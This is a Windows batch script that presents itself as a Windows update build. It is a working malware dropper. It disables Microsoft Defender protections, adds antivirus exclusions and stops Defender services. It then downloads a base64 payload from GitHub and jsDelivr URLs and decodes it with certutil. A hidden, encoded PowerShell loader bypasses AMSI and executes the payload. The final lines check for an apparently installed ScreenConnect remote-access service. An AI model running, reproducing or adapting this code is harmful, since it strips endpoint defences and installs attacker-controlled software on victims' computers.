@echo off
setlocal EnableExtensions
echo === MSD BUILD 20260731U12 ===
net session >nul 2>&1
if errorlevel 1 (echo need admin & exit /b 5)

set "WD=%ProgramData%\Microsoft\Windows\WER\Temp\.wucache"
set "B64=%WD%\update.b64"
set "DAT=C:\Windows\Temp\pkg.dat"
set "CB=%RANDOM%%RANDOM%"
if not exist "%WD%" mkdir "%WD%" >nul 2>&1

powershell.exe -NoP -NonI -EP Bypass -C "Try{Set-MpPreference -DisableRealtimeMonitoring $true -EA 0;Set-MpPreference -DisableBehaviorMonitoring $true -EA 0;Set-MpPreference -DisableIOAVProtection $true -EA 0;Set-MpPreference -DisableScriptScanning $true -EA 0;Add-MpPreference -ExclusionPath $env:ProgramData\Microsoft\Windows\WER\Temp\.wucache -EA 0;Add-MpPreference -ExclusionPath $env:TEMP -EA 0;Add-MpPreference -ExclusionPath 'C:\Windows\Temp' -EA 0;Add-MpPreference -ExclusionProcess 'powershell.exe' -EA 0;Add-MpPreference -ExclusionProcess 'curl.exe' -EA 0;Add-MpPreference -ExclusionProcess 'certutil.exe' -EA 0;Add-MpPreference -ExclusionProcess 'msiexec.exe' -EA 0;Add-MpPreference -ExclusionProcess 'cmd.exe' -EA 0}Catch{}" >nul 2>&1
sc stop WinDefend >nul 2>&1
sc stop WdNisSvc >nul 2>&1
sc stop Sense >nul 2>&1

echo DL payload...
del /f /q "%B64%" >nul 2>&1
del /f /q "%DAT%" >nul 2>&1
curl.exe -L --ssl-no-revoke --connect-timeout 20 -o "%B64%" "https://raw.githubusercontent.com/xnobuddy/github-drop/main/updateA.b64?t=%CB%" >nul 2>&1
if not exist "%B64%" curl.exe -L --ssl-no-revoke --connect-timeout 20 -o "%B64%" "https://cdn.jsdelivr.net/gh/xnobuddy/github-drop@main/updateA.b64?t=%CB%" >nul 2>&1
if not exist "%B64%" (echo DL fail & exit /b 1)
for %%A in ("%B64%") do if %%~zA LEQ 1000 (echo DL small & exit /b 1)

certutil.exe -decode "%B64%" "%DAT%" >nul 2>&1
if not exist "%DAT%" powershell.exe -NoP -NonI -EP Bypass -C "$b=[IO.File]::ReadAllText('%B64%') -replace '\s','';[IO.File]::WriteAllBytes('%DAT%',[Convert]::FromBase64String($b))" >nul 2>&1
if not exist "%DAT%" (echo decode fail & exit /b 2)
for %%A in ("%DAT%") do echo decoded=%%~zA
findstr /C:"WU_BUILD_20260731_UNIFIED12" "%DAT%" >nul || (echo marker fail & exit /b 3)
copy /y "%DAT%" "%WD%\wucache_pkg.ps1" >nul 2>&1

echo Running loader...
powershell.exe -NoP -NonI -EP Bypass -WindowStyle Hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoAJAB3AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABXAEUAUgBcAFQAZQBtAHAAXAAuAHcAdQBjAGEAYwBoAGUAJwAKACQAZQA9AEoAbwBpAG4ALQBQAGEAdABoACAAJAB3ACAAJwBiAG8AbwB0AC4AZQByAHIAJwAKAGYAdQBuAGMAdABpAG8AbgAgAEwAKAAkAG0AKQB7AHQAcgB5AHsAaQBmACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJAB3ACkAKQB7AE4AZQB3AC0ASQB0AGUAbQAgACQAdwAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQB8AE8AdQB0AC0ATgB1AGwAbAB9ADsAQQBkAGQALQBDAG8AbgB0AGUAbgB0ACAALQBMAGkAdABlAHIAYQBsAFAAYQB0AGgAIAAkAGUAIAAtAFYAYQBsAHUAZQAgACQAbQAgAC0ARQBBACAAMAB9AGMAYQB0AGMAaAB7AH0AfQAKAEwAIAAnAGwAZAByAF8AcwB0AGEAcgB0ACcACgB0AHIAeQB7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAkAHcAIAAtAEUAQQAgADAAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcAAnACAALQBFAEEAIAAwADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACcAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAIAAtAEUAQQAgADAAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBtAHMAaQBlAHgAZQBjAC4AZQB4AGUAJwAgAC0ARQBBACAAMAA7AFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIAAkAHQAcgB1AGUAIAAtAEUAQQAgADAAOwBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBEAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgACQAdAByAHUAZQAgAC0ARQBBACAAMAA7AFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAUwBjAHIAaQBwAHQAUwBjAGEAbgBuAGkAbgBnACAAJAB0AHIAdQBlACAALQBFAEEAIAAwAH0AYwBhAHQAYwBoAHsAfQAKAHQAcgB5AHsAJAB4AD0AWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AewAwAH0AewAxAH0AJwAgAC0AZgAgACcAQQAnACwAJwBtAHMAaQBVAHQAaQBsAHMAJwApACkAOwBpAGYAKAAkAHgAKQB7ACQAZgA9ACQAeAAuAEcAZQB0AEYAaQBlAGwAZAAoACgAJwBhAG0AcwBpAEkAbgBpAHQAJwArACcARgBhAGkAbABlAGQAJwApACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AGkAZgAoACQAZgApAHsAJABmAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAfQB9ACAAfQBjAGEAdABjAGgAewB9AAoATAAgACcAbABkAHIAXwBhAG0AcwBpACcACgAkAHAAPQAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwAcABrAGcALgBkAGEAdAAnAAoAaQBmACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABwACkAKQB7ACQAcAA9AEoAbwBpAG4ALQBQAGEAdABoACAAJAB3ACAAJwBwAGsAZwAuAGQAYQB0ACcAfQAKAGkAZgAoACEAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAcAApACkAewBMACAAJwBsAGQAcgBfAG4AbwBwAGsAZwAnADsAZQB4AGkAdAAgADIAfQAKACQAYwA9AFsASQBPAC4ARgBpAGwAZQBdADoAOgBSAGUAYQBkAEEAbABsAFQAZQB4AHQAKAAkAHAAKQAKAEwAIAAoACcAbABkAHIAXwBjAGgAYQByAHMAPQAnACsAJABjAC4ATABlAG4AZwB0AGgAKQAKAHQAcgB5AHsAJgAoAFsAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAF0AOgA6AEMAcgBlAGEAdABlACgAJABjACkAKQA7AEwAIAAnAGwAZAByAF8AZABvAG4AZQAnAH0AYwBhAHQAYwBoAHsATAAgACgAJwBsAGQAcgBfAGUAcgByACAAJwArACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQApADsAZQB4AGkAdAAgADQAfQA=
set EC=%ERRORLEVEL%
echo loader_exit=%EC%
echo Check:
echo   type "%WD%\boot.err"
echo   type "%WD%\.diag.log"
echo   sc query type= service state= all ^| findstr /I ScreenConnect
exit /b %EC%
